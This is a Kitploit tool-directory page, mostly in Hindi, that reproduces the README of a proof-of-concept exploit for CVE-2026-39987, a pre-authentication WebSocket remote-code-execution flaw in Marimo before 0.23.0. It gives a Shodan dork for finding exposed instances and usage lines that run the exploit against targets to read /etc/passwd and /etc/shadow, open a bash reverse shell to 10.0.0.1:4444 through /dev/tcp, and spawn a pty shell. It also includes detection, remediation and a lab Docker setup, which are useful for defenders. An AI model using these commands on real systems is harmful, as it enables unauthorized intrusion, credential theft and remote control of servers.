Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
marimo_CVE-2026-39987_RCE_PoC — PoC de CVE-2026-39987: RCE pre-autenticación vía WebSocket en Marimo menor a 0.23.0 (CVSS 9.3). | Kitploit
उपकरण/GitHubGitHub/fevar54/marimo_cve-2026-39987_rce_poc
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubfevar54/marimo_cve-2026-39987_rce_poc

marimo_CVE-2026-39987_RCE_PoC

PoC de CVE-2026-39987: RCE pre-autenticación vía WebSocket en Marimo menor a 0.23.0 (CVSS 9.3).

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-39987 - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)

⚠️ कानूनी चेतावनी ⚠️

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए है। बिना स्पष्ट अनुमति के सिस्टम के विरुद्ध इस टूल का अनधिकृत उपयोग अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए जिम्मेदार नहीं है।

📋 विवरण

Marimo के 0.23.0 से पहले के संस्करणों में बिना पूर्व प्रमाणीकरण के रिमोट कमांड निष्पादन (RCE) की गंभीर भेद्यता मौजूद है। /terminal/ws एंडपॉइंट पर्याप्त एक्सेस नियंत्रण लागू नहीं करता है, जिससे एक अनधिकृत हमलावर सिस्टम पर पूर्ण इंटरैक्टिव शेल प्राप्त कर सकता है।

विवरणजानकारी
CVECVE-2026-39987
गंभीरताCRITICAL
CVSS स्कोर9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H)
प्रकारPre-Auth Remote Code Execution (RCE)
वेक्टरWebSocket (/terminal/ws)
प्रभावित उत्पादMarimo < 0.23.0
पैचMarimo ≥ 0.23.0

🎯 प्रभाव

  • ✅ बिना प्रमाणीकरण के रिमोट कमांड निष्पादन
  • ✅ पूर्ण इंटरैक्टिव PTY शेल
  • ✅ सिस्टम का पूर्ण समझौता
  • ✅ संवेदनशील डेटा तक पहुंच
  • ✅ नेटवर्क में संभावित पार्श्व गति

🔍 पहचान

Shodan Dork

http.favicon.hash:-1864630356

text

फिंगरप्रिंट

  • Favicon हैश: -1864630356
  • एंडपॉइंट संस्करण: /api/version

💀 शोषण PoC

आवश्यकताएँ

root@kitploit:~
pip install websockets requests
बुनियादी उपयोग
bash
python CVE-2026-39987_PoC.py http://victima.com:8080 "id"
उदाहरण
bash
# सिस्टम जानकारी प्राप्त करें
python CVE-2026-39987_PoC.py http://target.com:8080 "id"
python CVE-2026-39987_PoC.py http://target.com:8080 "uname -a"
python CVE-2026-39987_PoC.py http://target.com:8080 "whoami"

# संवेदनशील फ़ाइलें पढ़ें
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/passwd"
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/shadow"

# रिवर्स शेल
python CVE-2026-39987_PoC.py http://target.com:8080 "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

# इंटरैक्टिव शेल
python CVE-2026-39987_PoC.py http://target.com:8080 "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
🛡️ पहचान (सुरक्षित)
निष्क्रिय पहचान स्क्रिप्ट
bash
python detector.py -u http://target.com:8080
python detector.py -l urls.txt
Nuclei टेम्पलेट
yaml
# marimo-cve-2026-39987.yaml
id: CVE-2026-39987

info:
  name: Marimo < 0.23.0 Pre-Auth RCE
  severity: critical
  # ... (पूर्ण टेम्पलेट शामिल)
🔧 उपचार
तत्काल
यदि सिस्टम एक्सपोज़्ड है तो उसे नेटवर्क से डिस्कनेक्ट करें

Marimo चल रहे पोर्ट तक पहुंच को ब्लॉक करें

संदिग्ध गतिविधि के लिए लॉग की जांच करें

स्थायी
bash
# पैच किए गए संस्करण में अपडेट करें
pip install --upgrade marimo>=0.23.0

# संस्करण सत्यापित करें
marimo --version

# सार्वजनिक रूप से एक्सपोज़ होने पर प्रमाणीकरण कॉन्फ़िगर करें
# 'marimo edit' को कभी भी सीधे इंटरनेट पर एक्सपोज़ न करें

Docker (कमजोर वातावरण)
bash
# परीक्षण के लिए कमजोर संस्करण चलाएं
docker run -p 8080:8080 marimo-team/marimo:0.22.0

# भेद्यता सत्यापित करें
python CVE-2026-39987_detector.py http://localhost:8080

# शोषण करें
python CVE-2026-39987_PoC.py http://localhost:8080 "id"

GitHub Security Advisory

NVD Entry

Pull Request #9098

Marimo Documentation

👥 क्रेडिट
खोज: [शोधकर्ता का नाम]

PoC विकास: [आपका नाम]

पैच: Marimo Team

📜 लाइसेंस
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। इस सॉफ़्टवेयर का उपयोग आपके अपने जोखिम पर है।

⭐ यदि यह README आपके लिए उपयोगी था, तो कृपया रिपॉजिटरी को एक स्टार दें।

⚠️ याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है।
टूल डाउनलोड करें